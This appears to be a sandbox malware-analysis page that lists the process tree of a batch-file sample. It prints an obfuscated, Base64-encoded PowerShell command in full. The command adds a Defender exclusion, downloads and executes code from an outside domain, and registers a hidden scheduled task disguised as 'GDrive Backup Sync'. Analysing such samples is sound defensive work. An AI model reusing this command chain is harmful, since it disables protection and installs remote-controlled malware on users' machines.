popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "afiBgqQhAnHnJC" C:\Users\test22\AppData\Local\Temp\test.bat

    2572

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\test.bat

      2644

      • powershell.exe powershell -ep bypass -w hidden -nop -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsADQAKACQATABpAG4AawBPAG4AZQBSACAAPQAgACcASgBBAEIATQBBAEcAawBBAGIAZwBCAHIAQQBFAGsAQQBSAFEAQgBZAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAGMAZwBCAGwAQQBHAE0AQQBiAHcAQgAyAEEARwBJAEEAWQBRAEIAegBBAEcAVQBBAEwAZwBCADAAQQBHADgAQQBjAEEAQQBuAEEARABzAEEARABRAEEASwBBAEMAUQBBAFEAdwBBADkAQQBHAGsAQQBkAHcAQgB5AEEAQwBBAEEASgBBAEIATQBBAEcAawBBAGIAZwBCAHIAQQBFAGsAQQBSAFEAQgBZAEEAQwBBAEEATABRAEIAVgBBAEgATQBBAFIAUQBCAEMAQQBHAEUAQQBVAHcAQgBKAEEARwBNAEEAVQBBAEIAQgBBAEgASQBBAGMAdwBCAHAAQQBFADQAQQBaAHcAQQBnAEEASAB3AEEAYQBRAEIAbABBAEgAZwBBAE8AdwBBAD0AJwA7AA0ACgAkAFQAIAA9ACAARwBlAHQALQBEAGEAdABlADsADQAKACQAVAAxACAAPQAgACQAVAAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAA4ACkAOwANAAoAJABUAFIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdAAgACQAVAAxACAALQBEAGEAaQBsAHkADQAKACQAUABTACAAPQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACIAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAOwANAAoAJABBACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAUABTACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAHAAIAAtAGUAbgBjACAAJABMAGkAbgBrAE8AbgBlAFIAIgA7AA0ACgAkAFAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFAAcgBpAG4AYwBpAHAAYQBsACAALQBVAHMAZQByACAAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQAgAC0ATABvAGcAbwBuAFQAeQBwAGUAIABTADQAVQAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAANAAoAJABTACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAE0AdQBsAHQAaQBwAGwAZQBJAG4AcwB0AGEAbgBjAGUAcwAgAFAAYQByAGEAbABsAGUAbAANAAoAJABUAE4AIAA9ACAAIgBHAEQAcgBpAHYAZQAgAEIAYQBjAGsAdQBwACAAUwB5AG4AYwAiADsADQAKAFUAbgByAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQARgBhAGwAcwBlADsADQAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACQAVABOACAALQBUAHIAaQBnAGcAZQByACAAJABUAFIAIAAtAEEAYwB0AGkAbwBuACAAJABBACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAFMAIAAtAFAAcgBpAG4AYwBpAHAAYQBsACAAJABQADsA

        2732

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf